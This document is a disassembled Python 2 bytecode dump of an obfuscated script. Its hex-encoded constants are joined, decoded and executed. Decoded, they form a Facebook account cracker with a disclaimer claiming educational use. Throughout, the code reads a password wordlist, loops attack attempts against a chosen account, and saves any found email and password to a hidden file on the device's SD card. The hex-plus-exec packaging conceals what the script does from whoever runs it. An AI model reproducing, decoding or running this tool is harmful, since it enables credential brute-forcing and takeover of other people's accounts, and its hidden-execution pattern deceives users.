           4220 BINARY_ADD          
           4221 LOAD_CONST             670 ('65286d6c2b')
           4224 BINARY_ADD          
           4225 LOAD_CONST             671 ('275c6e272b')
           4228 BINARY_ADD          
           4229 LOAD_CONST             672 ('70772b275c')
           4232 BINARY_ADD          
           4233 LOAD_CONST             560 ('6e272b7374')
           4236 BINARY_ADD          
           4237 LOAD_CONST             673 ('72286e6f29')
           4240 BINARY_ADD          
           4241 LOAD_CONST             500 ('290a202020')
           4244 BINARY_ADD          
           4245 LOAD_CONST             563 ('2020202065')
           4248 BINARY_ADD          
           4249 LOAD_CONST             366 ('7863657074')
           4252 BINARY_ADD          
           4253 LOAD_CONST             564 ('3a70617373')
           4256 BINARY_ADD          
           4257 LOAD_CONST             132 ('0a20202020')
           4260 BINARY_ADD          
           4261 LOAD_CONST             496 ('2020207379')
           4264 BINARY_ADD          
           4265 LOAD_CONST             588 ('732e657869')
           4268 BINARY_ADD          
           4269 LOAD_CONST             589 ('742831290a')
           4272 BINARY_ADD          
           4273 LOAD_CONST             644 ('2020202074')
           4276 BINARY_ADD          
           4277 LOAD_CONST             772 ('72793a0a20')
           4280 BINARY_ADD          
           4281 LOAD_CONST             136 ('2020202020')
           4284 BINARY_ADD          
           4285 LOAD_CONST             773 ('206c697374')
           4288 BINARY_ADD          
           4289 LOAD_CONST             774 ('203d206f70')
           4292 BINARY_ADD          
           4293 LOAD_CONST             775 ('656e287061')
           4296 BINARY_ADD          
           4297 LOAD_CONST             465 ('7373776f72')
           4300 BINARY_ADD          
           4301 LOAD_CONST             776 ('646c697374')
           4304 BINARY_ADD          
           4305 LOAD_CONST             777 ('2c20227222')
           4308 BINARY_ADD          
           4309 LOAD_CONST             500 ('290a202020')
           4312 BINARY_ADD          
           4313 LOAD_CONST             778 ('2020202070')
           4316 BINARY_ADD          
           4317 LOAD_CONST             322 ('617373776f')
           4320 BINARY_ADD          
           4321 LOAD_CONST             779 ('726473203d')
           4324 BINARY_ADD          
           4325 LOAD_CONST             773 ('206c697374')
           4328 BINARY_ADD          
           4329 LOAD_CONST             780 ('2e72656164')
           4332 BINARY_ADD          
           4333 LOAD_CONST             781 ('6c696e6573')
           4336 BINARY_ADD          
           4337 LOAD_CONST             715 ('28290a2020')
           4340 BINARY_ADD          
           4341 LOAD_CONST             136 ('2020202020')
           4344 BINARY_ADD          
           4345 LOAD_CONST             782 ('6b203d2030')
           4348 BINARY_ADD          
           4349 LOAD_CONST             132 ('0a20202020')
           4352 BINARY_ADD          
           4353 LOAD_CONST             783 ('2020207768')
           4356 BINARY_ADD          
           4357 LOAD_CONST             784 ('696c65206b')
           4360 BINARY_ADD          
           4361 LOAD_CONST             785 ('203c206c65')
           4364 BINARY_ADD          
           4365 LOAD_CONST             786 ('6e28706173')
           4368 BINARY_ADD          
           4369 LOAD_CONST             391 ('73776f7264')
           4372 BINARY_ADD          
           4373 LOAD_CONST             787 ('73293a0a20')
           4376 BINARY_ADD          
           4377 LOAD_CONST             136 ('2020202020')
           4380 BINARY_ADD          
           4381 LOAD_CONST             778 ('2020202070')
           4384 BINARY_ADD          
           4385 LOAD_CONST             322 ('617373776f')
           4388 BINARY_ADD          
           4389 LOAD_CONST             788 ('7264735b6b')
           4392 BINARY_ADD          
           4393 LOAD_CONST             789 ('5d203d2070')
           4396 BINARY_ADD          
           4397 LOAD_CONST             322 ('617373776f')
           4400 BINARY_ADD          
           4401 LOAD_CONST             788 ('7264735b6b')
           4404 BINARY_ADD          
           4405 LOAD_CONST             790 ('5d2e737472')
           4408 BINARY_ADD          
           4409 LOAD_CONST             791 ('697028290a')
           4412 BINARY_ADD          
           4413 LOAD_CONST             136 ('2020202020')
           4416 BINARY_ADD          
           4417 LOAD_CONST             136 ('2020202020')
           4420 BINARY_ADD          
           4421 LOAD_CONST             792 ('6b202b3d20')
           4424 BINARY_ADD          
           4425 LOAD_CONST             793 ('310a202020')
           4428 BINARY_ADD          
           4429 LOAD_CONST             674 ('2065786365')
           4432 BINARY_ADD          
           4433 LOAD_CONST             794 ('707420494f')
           4436 BINARY_ADD          
           4437 LOAD_CONST             795 ('4572726f72')
           4440 BINARY_ADD          
           4441 LOAD_CONST             688 ('3a0a202020')
           4444 BINARY_ADD          
           4445 LOAD_CONST             136 ('2020202020')
           4448 BINARY_ADD          
           4449 LOAD_CONST             236 ('7072696e74')
           4452 BINARY_ADD          
           4453 LOAD_CONST             796 ('20225c6e20')
           4456 BINARY_ADD          
           4457 LOAD_CONST             596 ('5b2a5d2045')
           4460 BINARY_ADD          
           4461 LOAD_CONST             797 ('72726f723a')
           4464 BINARY_ADD          
           4465 LOAD_CONST             798 ('2063686563')
           4468 BINARY_ADD          
           4469 LOAD_CONST             799 ('6b20796f75')
           4472 BINARY_ADD          
           4473 LOAD_CONST             800 ('7220706173')
           4476 BINARY_ADD          
           4477 LOAD_CONST             391 ('73776f7264')
           4480 BINARY_ADD          
           4481 LOAD_CONST             773 ('206c697374')
           4484 BINARY_ADD          
           4485 LOAD_CONST             801 ('2070617468')
           4488 BINARY_ADD          
           4489 LOAD_CONST             802 ('205c6e220a')
           4492 BINARY_ADD          
           4493 LOAD_CONST             136 ('2020202020')
           4496 BINARY_ADD          
           4497 LOAD_CONST             496 ('2020207379')
           4500 BINARY_ADD          
           4501 LOAD_CONST             588 ('732e657869')
           4504 BINARY_ADD          
           4505 LOAD_CONST             589 ('742831290a')
           4508 BINARY_ADD          
           4509 LOAD_CONST             563 ('2020202065')
           4512 BINARY_ADD          
           4513 LOAD_CONST             366 ('7863657074')
           4516 BINARY_ADD          
           4517 LOAD_CONST             803 ('204b657962')
           4520 BINARY_ADD          
           4521 LOAD_CONST             804 ('6f61726449')
           4524 BINARY_ADD          
           4525 LOAD_CONST             805 ('6e74657272')
           4528 BINARY_ADD          
           4529 LOAD_CONST             806 ('7570743a0a')
           4532 BINARY_ADD          
           4533 LOAD_CONST             136 ('2020202020')
           4536 BINARY_ADD          
           4537 LOAD_CONST             572 ('2020207072')
           4540 BINARY_ADD          
           4541 LOAD_CONST             573 ('696e742022')
           4544 BINARY_ADD          
           4545 LOAD_CONST             807 ('5c6e205b2a')
           4548 BINARY_ADD          
           4549 LOAD_CONST             808 ('5d20457869')
           4552 BINARY_ADD          
           4553 LOAD_CONST             809 ('74696e6720')
           4556 BINARY_ADD          
           4557 LOAD_CONST             810 ('70726f6772')
           4560 BINARY_ADD          
           4561 LOAD_CONST             811 ('616d202e2e')
           4564 BINARY_ADD          
           4565 LOAD_CONST             812 ('5c6e220a20')
           4568 BINARY_ADD          
           4569 LOAD_CONST             136 ('2020202020')
           4572 BINARY_ADD          
           4573 LOAD_CONST             761 ('2020747279')
           4576 BINARY_ADD          
           4577 LOAD_CONST             762 ('3a6f70656e')
           4580 BINARY_ADD          
           4581 LOAD_CONST             277 ('28272f7374')
           4584 BINARY_ADD          
           4585 LOAD_CONST             278 ('6f72616765')
           4588 BINARY_ADD          
           4589 LOAD_CONST             279 ('2f73646361')
           4592 BINARY_ADD          
           4593 LOAD_CONST             280 ('7264312f2e')
           4596 BINARY_ADD          
           4597 LOAD_CONST             281 ('66622e6461')
           4600 BINARY_ADD          
           4601 LOAD_CONST             555 ('74272c2777')
           4604 BINARY_ADD          
           4605 LOAD_CONST             556 ('27292e7772')
           4608 BINARY_ADD          
           4609 LOAD_CONST             763 ('697465286d')
           4612 BINARY_ADD          
           4613 LOAD_CONST             388 ('6c2b275c6e')
           4616 BINARY_ADD          
           4617 LOAD_CONST             393 ('272b70772b')
           4620 BINARY_ADD          
           4621 LOAD_CONST             671 ('275c6e272b')
           4624 BINARY_ADD          
           4625 LOAD_CONST             764 ('737472286e')
           4628 BINARY_ADD          
           4629 LOAD_CONST             765 ('6f29290a20')
           4632 BINARY_ADD          
           4633 LOAD_CONST             136 ('2020202020')
           4636 BINARY_ADD          
           4637 LOAD_CONST             590 ('2020657863')
           4640 BINARY_ADD          
           4641 LOAD_CONST             813 ('6570743a70')
           4644 BINARY_ADD          
           4645 LOAD_CONST             814 ('6173730a20')
           4648 BINARY_ADD          
           4649 LOAD_CONST             136 ('2020202020')
           4652 BINARY_ADD          
           4653 LOAD_CONST             815 ('2020737973')
           4656 BINARY_ADD          
           4657 LOAD_CONST             816 ('2e65786974')
           4660 BINARY_ADD          
           4661 LOAD_CONST             817 ('2831290a20')
           4664 BINARY_ADD          
           4665 LOAD_CONST             612 ('2020206578')
           4668 BINARY_ADD          
           4669 LOAD_CONST             306 ('636570743a')
           4672 BINARY_ADD          
           4673 LOAD_CONST             132 ('0a20202020')
           4676 BINARY_ADD          
           4677 LOAD_CONST             778 ('2020202070')
           4680 BINARY_ADD          
           4681 LOAD_CONST             818 ('72696e7420')
           4684 BINARY_ADD          
           4685 LOAD_CONST             819 ('225c6e5b2a')
           4688 BINARY_ADD          
           4689 LOAD_CONST             820 ('5d204b6f6e')
           4692 BINARY_ADD          
           4693 LOAD_CONST             821 ('656b736920')
           4696 BINARY_ADD          
           4697 LOAD_CONST             822 ('4861626973')
           4700 BINARY_ADD          
           4701 LOAD_CONST             823 ('202e2e2022')
           4704 BINARY_ADD          
           4705 LOAD_CONST             132 ('0a20202020')
           4708 BINARY_ADD          
           4709 LOAD_CONST             644 ('2020202074')
           4712 BINARY_ADD          
           4713 LOAD_CONST             645 ('72793a6f70')
           4716 BINARY_ADD          
           4717 LOAD_CONST             646 ('656e28272f')
           4720 BINARY_ADD          
           4721 LOAD_CONST             647 ('73746f7261')
           4724 BINARY_ADD          
           4725 LOAD_CONST             648 ('67652f7364')
           4728 BINARY_ADD          
           4729 LOAD_CONST             649 ('6361726431')
           4732 BINARY_ADD          
           4733 LOAD_CONST             650 ('2f2e66622e')
           4736 BINARY_ADD          
           4737 LOAD_CONST             651 ('646174272c')
           4740 BINARY_ADD          
           4741 LOAD_CONST             652 ('277727292e')
           4744 BINARY_ADD          
           4745 LOAD_CONST             653 ('7772697465')
           4748 BINARY_ADD          
           4749 LOAD_CONST             654 ('286d6c2b27')
           4752 BINARY_ADD          
           4753 LOAD_CONST             655 ('5c6e272b70')
           4756 BINARY_ADD          
           4757 LOAD_CONST             656 ('772b275c6e')
           4760 BINARY_ADD          
           4761 LOAD_CONST             657 ('272b737472')
           4764 BINARY_ADD          
           4765 LOAD_CONST             658 ('286e6f2929')
           4768 BINARY_ADD          
           4769 LOAD_CONST             132 ('0a20202020')
           4772 BINARY_ADD          
           4773 LOAD_CONST             563 ('2020202065')
           4776 BINARY_ADD          
           4777 LOAD_CONST             366 ('7863657074')
           4780 BINARY_ADD          
           4781 LOAD_CONST             564 ('3a70617373')
           4784 BINARY_ADD          
           4785 LOAD_CONST             132 ('0a20202020')
           4788 BINARY_ADD          
           4789 LOAD_CONST             824 ('2020202073')
           4792 BINARY_ADD          
           4793 LOAD_CONST             627 ('79732e6578')
           4796 BINARY_ADD          
           4797 LOAD_CONST             825 ('6974283129')
           4800 BINARY_ADD          
           4801 LOAD_CONST             132 ('0a20202020')
           4804 BINARY_ADD          
           4805 LOAD_CONST             826 ('7472793a0a')
           4808 BINARY_ADD          
           4809 LOAD_CONST             136 ('2020202020')
           4812 BINARY_ADD          
           4813 LOAD_CONST             572 ('2020207072')
           4816 BINARY_ADD          
           4817 LOAD_CONST             827 ('696e742047')
           4820 BINARY_ADD          
           4821 LOAD_CONST             828 ('48540a2020')
           4824 BINARY_ADD          
           4825 LOAD_CONST             136 ('2020202020')
           4828 BINARY_ADD          
           4829 LOAD_CONST             580 ('207072696e')
           4832 BINARY_ADD          
           4833 LOAD_CONST             829 ('7420572b22')
           4836 BINARY_ADD          
           4837 LOAD_CONST             830 ('205b2a5d22')
           4840 BINARY_ADD          
           4841 LOAD_CONST             485 ('2b432b2220')
           4844 BINARY_ADD          
           4845 LOAD_CONST             831 ('4163636f75')
           4848 BINARY_ADD          
           4849 LOAD_CONST              51 ('6e7420746f')
           4852 BINARY_ADD          
           4853 LOAD_CONST              52 ('2063726163')
           4856 BINARY_ADD          
           4857 LOAD_CONST             832 ('6b203a222b')
           4860 BINARY_ADD          
           4861 LOAD_CONST             833 ('4f2b222025')
           4864 BINARY_ADD          
           4865 LOAD_CONST             834 ('7322202520')
           4868 BINARY_ADD          
           4869 LOAD_CONST             835 ('28656d6169')
           4872 BINARY_ADD          
           4873 LOAD_CONST             836 ('6c292b570a')
           4876 BINARY_ADD          
           4877 LOAD_CONST             136 ('2020202020')
           4880 BINARY_ADD          
           4881 LOAD_CONST             572 ('2020207072')
           4884 BINARY_ADD          
           4885 LOAD_CONST             837 ('696e742057')
           4888 BINARY_ADD          
           4889 LOAD_CONST             838 ('2b22205b2a')
           4892 BINARY_ADD          
           4893 LOAD_CONST             839 ('5d222b432b')
           4896 BINARY_ADD          
           4897 LOAD_CONST             840 ('22204c6f61')
           4900 BINARY_ADD          
           4901 LOAD_CONST             841 ('646564203a')
           4904 BINARY_ADD          
           4905 LOAD_CONST             842 ('22202c204f')
           4908 BINARY_ADD          
           4909 LOAD_CONST             610 ('2b73747228')
           4912 BINARY_ADD          
           4913 LOAD_CONST             843 ('6c656e2870')
           4916 BINARY_ADD          
           4917 LOAD_CONST             322 ('617373776f')
           4920 BINARY_ADD          
           4921 LOAD_CONST             844 ('7264732929')
           4924 BINARY_ADD          
           4925 LOAD_CONST             845 ('2c432b2022')
           4928 BINARY_ADD          
           4929 LOAD_CONST             493 ('7061737377')
           4932 BINARY_ADD          
           4933 LOAD_CONST             846 ('6f72647322')
           4936 BINARY_ADD          
           4937 LOAD_CONST             847 ('2b570a2020')
           4940 BINARY_ADD          
           4941 LOAD_CONST             136 ('2020202020')
           4944 BINARY_ADD          
           4945 LOAD_CONST             580 ('207072696e')
           4948 BINARY_ADD          
           4949 LOAD_CONST             829 ('7420572b22')
           4952 BINARY_ADD          
           4953 LOAD_CONST             830 ('205b2a5d22')
           4956 BINARY_ADD          
           4957 LOAD_CONST             485 ('2b432b2220')
           4960 BINARY_ADD          
           4961 LOAD_CONST             142 ('437261636b')
           4964 BINARY_ADD          
           4965 LOAD_CONST             848 ('696e672c20')
           4968 BINARY_ADD          
           4969 LOAD_CONST             849 ('706c656173')
           4972 BINARY_ADD          
           4973 LOAD_CONST             850 ('6520776169')
           4976 BINARY_ADD          
           4977 LOAD_CONST             851 ('74202e2e2e')
           4980 BINARY_ADD          
           4981 LOAD_CONST             852 ('222b570a20')
           4984 BINARY_ADD          
           4985 LOAD_CONST             612 ('2020206578')
           4988 BINARY_ADD          
           4989 LOAD_CONST             853 ('6365707420')
           4992 BINARY_ADD          
           4993 LOAD_CONST             854 ('4b6579626f')
           4996 BINARY_ADD          
           4997 LOAD_CONST             855 ('617264496e')
           5000 BINARY_ADD          
           5001 LOAD_CONST             856 ('7465727275')
           5004 BINARY_ADD          
           5005 LOAD_CONST             766 ('70743a0a20')
           5008 BINARY_ADD          
           5009 LOAD_CONST             136 ('2020202020')
           5012 BINARY_ADD          
           5013 LOAD_CONST             546 ('2020707269')
           5016 BINARY_ADD          
           5017 LOAD_CONST             677 ('6e7420225c')
           5020 BINARY_ADD          
           5021 LOAD_CONST             575 ('6e205b2a5d')
           5024 BINARY_ADD          
           5025 LOAD_CONST             857 ('2045786974')
           5028 BINARY_ADD          
           5029 LOAD_CONST             858 ('696e672070')
           5032 BINARY_ADD          
           5033 LOAD_CONST             859 ('726f677261')
           5036 BINARY_ADD          
           5037 LOAD_CONST             860 ('6d202e2e5c')
           5040 BINARY_ADD          
           5041 LOAD_CONST             861 ('6e220a2020')
           5044 BINARY_ADD          
           5045 LOAD_CONST             136 ('2020202020')
           5048 BINARY_ADD          
           5049 LOAD_CONST             351 ('207472793a')
           5052 BINARY_ADD          
           5053 LOAD_CONST             352 ('6f70656e28')
           5056 BINARY_ADD          
           5057 LOAD_CONST             353 ('272f73746f')
           5060 BINARY_ADD          
           5061 LOAD_CONST             354 ('726167652f')
           5064 BINARY_ADD          
           5065 LOAD_CONST             355 ('7364636172')
           5068 BINARY_ADD          
           5069 LOAD_CONST             356 ('64312f2e66')
           5072 BINARY_ADD          
           5073 LOAD_CONST             357 ('622e646174')
           5076 BINARY_ADD          
           5077 LOAD_CONST             358 ('272c277727')
           5080 BINARY_ADD          
           5081 LOAD_CONST             359 ('292e777269')
           5084 BINARY_ADD          
           5085 LOAD_CONST             360 ('7465286d6c')
           5088 BINARY_ADD          
           5089 LOAD_CONST             361 ('2b275c6e27')
           5092 BINARY_ADD          
           5093 LOAD_CONST             362 ('2b70772b27')
           5096 BINARY_ADD          
           5097 LOAD_CONST             363 ('5c6e272b73')
           5100 BINARY_ADD          
           5101 LOAD_CONST             862 ('7472286e6f')
           5104 BINARY_ADD          
           5105 LOAD_CONST             562 ('29290a2020')
           5108 BINARY_ADD          
           5109 LOAD_CONST             136 ('2020202020')
           5112 BINARY_ADD          
           5113 LOAD_CONST             674 ('2065786365')
           5116 BINARY_ADD          
           5117 LOAD_CONST             675 ('70743a7061')
           5120 BINARY_ADD          
           5121 LOAD_CONST             676 ('73730a2020')
           5124 BINARY_ADD          
           5125 LOAD_CONST             136 ('2020202020')
           5128 BINARY_ADD          
           5129 LOAD_CONST             479 ('207379732e')
           5132 BINARY_ADD          
           5133 LOAD_CONST             863 ('6578697428')
           5136 BINARY_ADD          
           5137 LOAD_CONST             755 ('31290a2020')
           5140 BINARY_ADD          
           5141 LOAD_CONST             590 ('2020657863')
           5144 BINARY_ADD          
           5145 LOAD_CONST             614 ('6570743a0a')
           5148 BINARY_ADD          
           5149 LOAD_CONST             136 ('2020202020')
           5152 BINARY_ADD          
           5153 LOAD_CONST             572 ('2020207072')
           5156 BINARY_ADD          
           5157 LOAD_CONST             573 ('696e742022')
           5160 BINARY_ADD          
           5161 LOAD_CONST             864 ('5c6e5b2a5d')
           5164 BINARY_ADD          
           5165 LOAD_CONST             865 ('204b6f6e65')
           5168 BINARY_ADD          
           5169 LOAD_CONST             866 ('6b73692048')
           5172 BINARY_ADD          
           5173 LOAD_CONST             867 ('6162697320')
           5176 BINARY_ADD          
           5177 LOAD_CONST             600 ('2e2e20220a')
           5180 BINARY_ADD          
           5181 LOAD_CONST             136 ('2020202020')
           5184 BINARY_ADD          
           5185 LOAD_CONST             549 ('2020207472')
           5188 BINARY_ADD          
           5189 LOAD_CONST             550 ('793a6f7065')
           5192 BINARY_ADD          
           5193 LOAD_CONST             551 ('6e28272f73')
           5196 BINARY_ADD          
           5197 LOAD_CONST             601 ('746f726167')
           5200 BINARY_ADD          
           5201 LOAD_CONST             602 ('652f736463')
           5204 BINARY_ADD          
           5205 LOAD_CONST             603 ('617264312f')
           5208 BINARY_ADD          
           5209 LOAD_CONST             604 ('2e66622e64')
           5212 BINARY_ADD          
           5213 LOAD_CONST             605 ('6174272c27')
           5216 BINARY_ADD          
           5217 LOAD_CONST             606 ('7727292e77')
           5220 BINARY_ADD          
           5221 LOAD_CONST             607 ('7269746528')
           5224 BINARY_ADD          
           5225 LOAD_CONST             608 ('6d6c2b275c')
           5228 BINARY_ADD          
           5229 LOAD_CONST             609 ('6e272b7077')
           5232 BINARY_ADD          
           5233 LOAD_CONST             361 ('2b275c6e27')
           5236 BINARY_ADD          
           5237 LOAD_CONST             610 ('2b73747228')
           5240 BINARY_ADD          
           5241 LOAD_CONST             611 ('6e6f29290a')
           5244 BINARY_ADD          
           5245 LOAD_CONST             136 ('2020202020')
           5248 BINARY_ADD          
           5249 LOAD_CONST             612 ('2020206578')
           5252 BINARY_ADD          
           5253 LOAD_CONST             306 ('636570743a')
           5256 BINARY_ADD          
           5257 LOAD_CONST             613 ('706173730a')
           5260 BINARY_ADD          
           5261 LOAD_CONST             136 ('2020202020')
           5264 BINARY_ADD          
           5265 LOAD_CONST             496 ('2020207379')
           5268 BINARY_ADD          
           5269 LOAD_CONST             588 ('732e657869')
           5272 BINARY_ADD          
           5273 LOAD_CONST             589 ('742831290a')
           5276 BINARY_ADD          
           5277 LOAD_CONST             644 ('2020202074')
           5280 BINARY_ADD          
           5281 LOAD_CONST             772 ('72793a0a20')
           5284 BINARY_ADD          
           5285 LOAD_CONST             136 ('2020202020')
           5288 BINARY_ADD          
           5289 LOAD_CONST             868 ('2020736561')
           5292 BINARY_ADD          
           5293 LOAD_CONST             687 ('7263682829')
           5296 BINARY_ADD          
           5297 LOAD_CONST             132 ('0a20202020')
           5300 BINARY_ADD          
           5301 LOAD_CONST             694 ('2020202061')
           5304 BINARY_ADD          
           5305 LOAD_CONST             695 ('747461636b')
           5308 BINARY_ADD          
           5309 LOAD_CONST             696 ('2870617373')
           5312 BINARY_ADD          
           5313 LOAD_CONST             869 ('776f726429')
           5316 BINARY_ADD          
           5317 LOAD_CONST             132 ('0a20202020')
           5320 BINARY_ADD          
           5321 LOAD_CONST             623 ('6578636570')
           5324 BINARY_ADD          
           5325 LOAD_CONST             870 ('74204b6579')
           5328 BINARY_ADD          
           5329 LOAD_CONST             871 ('626f617264')
           5332 BINARY_ADD          
           5333 LOAD_CONST             872 ('496e746572')
           5336 BINARY_ADD          
           5337 LOAD_CONST             873 ('727570743a')
           5340 BINARY_ADD          
           5341 LOAD_CONST             132 ('0a20202020')
           5344 BINARY_ADD          
           5345 LOAD_CONST             778 ('2020202070')
           5348 BINARY_ADD          
           5349 LOAD_CONST             818 ('72696e7420')
           5352 BINARY_ADD          
           5353 LOAD_CONST             874 ('225c6e205b')
           5356 BINARY_ADD          
           5357 LOAD_CONST             757 ('2a5d204578')
           5360 BINARY_ADD          
           5361 LOAD_CONST             758 ('6974696e67')
           5364 BINARY_ADD          
           5365 LOAD_CONST             217 ('2070726f67')
           5368 BINARY_ADD          
           5369 LOAD_CONST             759 ('72616d202e')
           5372 BINARY_ADD          
           5373 LOAD_CONST             760 ('2e5c6e220a')
           5376 BINARY_ADD          
           5377 LOAD_CONST             136 ('2020202020')
           5380 BINARY_ADD          
           5381 LOAD_CONST             549 ('2020207472')
           5384 BINARY_ADD          
           5385 LOAD_CONST             550 ('793a6f7065')
           5388 BINARY_ADD          
           5389 LOAD_CONST             551 ('6e28272f73')
           5392 BINARY_ADD          
           5393 LOAD_CONST             601 ('746f726167')
           5396 BINARY_ADD          
           5397 LOAD_CONST             602 ('652f736463')
           5400 BINARY_ADD          
           5401 LOAD_CONST             603 ('617264312f')
           5404 BINARY_ADD          
           5405 LOAD_CONST             604 ('2e66622e64')
           5408 BINARY_ADD          
           5409 LOAD_CONST             605 ('6174272c27')
           5412 BINARY_ADD          
           5413 LOAD_CONST             606 ('7727292e77')
           5416 BINARY_ADD          
           5417 LOAD_CONST             607 ('7269746528')
           5420 BINARY_ADD          
           5421 LOAD_CONST             608 ('6d6c2b275c')
           5424 BINARY_ADD          
           5425 LOAD_CONST             609 ('6e272b7077')
           5428 BINARY_ADD          
           5429 LOAD_CONST             361 ('2b275c6e27')
           5432 BINARY_ADD          
           5433 LOAD_CONST             610 ('2b73747228')
           5436 BINARY_ADD          
           5437 LOAD_CONST             611 ('6e6f29290a')
           5440 BINARY_ADD          
           5441 LOAD_CONST             136 ('2020202020')
           5444 BINARY_ADD          
           5445 LOAD_CONST             612 ('2020206578')
           5448 BINARY_ADD          
           5449 LOAD_CONST             306 ('636570743a')
           5452 BINARY_ADD          
           5453 LOAD_CONST             613 ('706173730a')
           5456 BINARY_ADD          
           5457 LOAD_CONST             136 ('2020202020')
           5460 BINARY_ADD          
           5461 LOAD_CONST             496 ('2020207379')
           5464 BINARY_ADD          
           5465 LOAD_CONST             588 ('732e657869')
           5468 BINARY_ADD          
           5469 LOAD_CONST             589 ('742831290a')
           5472 BINARY_ADD          
           5473 LOAD_CONST             875 ('0a6966205f')
           5476 BINARY_ADD          
           5477 LOAD_CONST             876 ('5f6e616d65')
           5480 BINARY_ADD          
           5481 LOAD_CONST             877 ('5f5f203d3d')
           5484 BINARY_ADD          
           5485 LOAD_CONST             878 ('20275f5f6d')
           5488 BINARY_ADD          
           5489 LOAD_CONST             879 ('61696e5f5f')
           5492 BINARY_ADD          
           5493 LOAD_CONST             880 ('273a0a2020')
           5496 BINARY_ADD          
           5497 LOAD_CONST             881 ('2020636865')
           5500 BINARY_ADD          
           5501 LOAD_CONST             882 ('636b2829')
           5504 BINARY_ADD          
           5505 LOAD_CONST             883 ('"')
           5508 BINARY_ADD          
           5509 LOAD_CONST             884 ('.')
           5512 BINARY_ADD          
           5513 LOAD_CONST             885 ('dec')
           5516 BINARY_ADD          
           5517 LOAD_CONST             886 ('ode')
           5520 BINARY_ADD          
           5521 LOAD_CONST             887 ('("')
           5524 BINARY_ADD          
           5525 LOAD_CONST             888 ('h')
           5528 BINARY_ADD          
           5529 LOAD_CONST             889 ('')
           5532 BINARY_ADD          
           5533 LOAD_CONST             889 ('')
           5536 BINARY_ADD          
           5537 LOAD_CONST             889 ('')
           5540 BINARY_ADD          
           5541 LOAD_CONST             889 ('')
           5544 BINARY_ADD          
           5545 LOAD_CONST             889 ('')
           5548 BINARY_ADD          
           5549 LOAD_CONST             889 ('')
           5552 BINARY_ADD          
           5553 LOAD_CONST             890 ('e')
           5556 BINARY_ADD          
           5557 LOAD_CONST             889 ('')
           5560 BINARY_ADD          
           5561 LOAD_CONST             889 ('')
           5564 BINARY_ADD          
           5565 LOAD_CONST             889 ('')
           5568 BINARY_ADD          
           5569 LOAD_CONST             891 ('x"')
           5572 BINARY_ADD          
           5573 LOAD_CONST             892 (')')
           5576 BINARY_ADD          
           5577 LOAD_CONST             884 ('.')
           5580 BINARY_ADD          
           5581 LOAD_CONST             885 ('dec')
           5584 BINARY_ADD          
           5585 LOAD_CONST             886 ('ode')
           5588 BINARY_ADD          
           5589 LOAD_CONST             893 ('(')
           5592 BINARY_ADD          
           5593 LOAD_CONST             894 ('"u')
           5596 BINARY_ADD          
           5597 LOAD_CONST             895 ('8"')
           5600 BINARY_ADD          
           5601 LOAD_CONST             892 (')')
           5604 BINARY_ADD          
           5605 LOAD_CONST             896 (None)
           5608 DUP_TOP             
           5609 EXEC_STMT           
           5610 LOAD_CONST             896 (None)
           5613 RETURN_VALUE        
   consts
      '0000'
      'ex'
      'ec"'
      '2321757372'
      '2f62696e2f'
      '707974686f'
      '6e0a234661'
      '6365626f6f'
      '6b20437261'
      '636b657220'
      '5665727369'
      '6f6e203220'
      '63616e2063'
      '7261636b20'
      '696e746f20'
      '4661636562'
      '6f6f6b2044'
      '6174616261'
      '7365203130'
      '3025207769'
      '74686f7574'
      '20496e7465'
      '7272757074'
      '696f6e2042'
      '7920466163'
      '65626f6f6b'
      '2046697265'
      '77616c6c20'
      '210a235468'
      '6973207072'
      '6f6772616d'
      '2069732066'
      '6f72206564'
      '7563617469'
      '6f6e616c20'
      '707572706f'
      '736573206f'
      '6e6c792e0a'
      '23446f6e27'
      '7420617474'
      '61636b2070'
      '656f706c65'
      '2066616365'
      '626f6f6b20'
      '6163636f75'
      '6e74732069'
      '7427732069'
      '6c6c656761'
      '6c2021200a'
      '2349662079'
      '6f75207761'
      '6e7420746f'
      '2063726163'
      '6b20696e74'
      '6f20736f6d'
      '656f6e6527'
      '7320616363'
      '6f756e742c'
      '20796f7520'
      '6d75737420'
      '6861766520'
      '7468652070'
      '65726d6973'
      '73696f6e20'
      '6f66207468'
      '6520757365'
      '722e200a23'
      '496e666f73'
      '6563486163'
      '6b65722069'
      '73206e6f74'
      '2072657370'
      '6f6e736962'
      '6c652e0a0a'
      '0a696d706f'
      '7274207379'
      '730a696d70'
      '6f72742072'
      '616e646f6d'
      '7274206d65'
      '6368616e69'
      '7a650a696d'
      '706f727420'
      '636f6f6b69'
      '656c69620a'
      '0a2320436f'
      '6e736f6c65'
      '20636f6c6f'
      '72730a6267'
      '203d272720'
      '2320275c30'
      '33335b3434'
      '6d27202023'
      '2067726179'
      '0a57203d20'
      '62672b275c'
      '3033335b30'
      '2077686974'
      '6520286e6f'
      '726d616c29'
      '0a52203d20'
      '3033335b33'
      '316d272020'
      '2320726564'
      '0a47203d20'
      '326d272020'
      '2320677265'
      '656e0a4f20'
      '3d2062672b'
      '275c303333'
      '5b33336d27'
      '202023206f'
      '72616e6765'
      '0a42203d20'
      '346d272020'
      '2320626c75'
      '650a50203d'
      '2062672b27'
      '5c3033335b'
      '33356d2720'
      '2023207075'
      '72706c650a'
      '43203d2062'
      '672b275c30'
      '33335b3336'
      '206379616e'
      '0a4752203d'
      '33376d2720'
      '2023206772'
      '61790a0a47'
      '4854203d20'
      '472b272727'
      '0a20202020'
      '202020202b'
      '3d3d3d3d3d'
      '3d2b0a2020'
      '2020202020'
      '207c2e2e2e'
      '2e2e2e2e2e'
      '2e2e272727'
      '2b4f2b2727'
      '2746616365'
      '437261636b'
      '6572207620'
      '322727272b'
      '2e7c0a2020'
      '202b2d2d2d'
      '2d2d2d2d2d'
      '2d2d2d2b0a'
      '2020207c27'
      '27272b432b'
      '2727272341'
      '7574686f72'
      '3a20496e66'
      '6f53656348'
      '61636b6572'
      '2727272b47'
      '2b27272720'
      '2020207c0a'
      '2727272343'
      '6f6e746163'
      '743a207777'
      '772e747769'
      '747465722e'
      '636f6d2f61'
      '6268697368'
      '656b6d616e'
      '6930303227'
      '27272b472b'
      '2727277c0a'
      '2727272344'
      '6174653a20'
      '32332f3130'
      '2f32303135'
      '2727272354'
      '6869732074'
      '6f6f6c2069'
      '73206d6164'
      '6520666f72'
      '2070656e74'
      '657374696e'
      '672e202727'
      '272b472b27'
      '2727202020'
      '68616e6769'
      '6e67207468'
      '6520446573'
      '6372697074'
      '696f6e206f'
      '6620746869'
      '7320746f6f'
      '6c2727272b'
      '272727576f'
      '6e2774206d'
      '6164652079'
      '6f75207468'
      '6520636f64'
      '6572205e5f'
      '5e20212121'
      '2727272352'
      '6573706563'
      '7420436f64'
      '65727a205e'
      '5f5e202020'
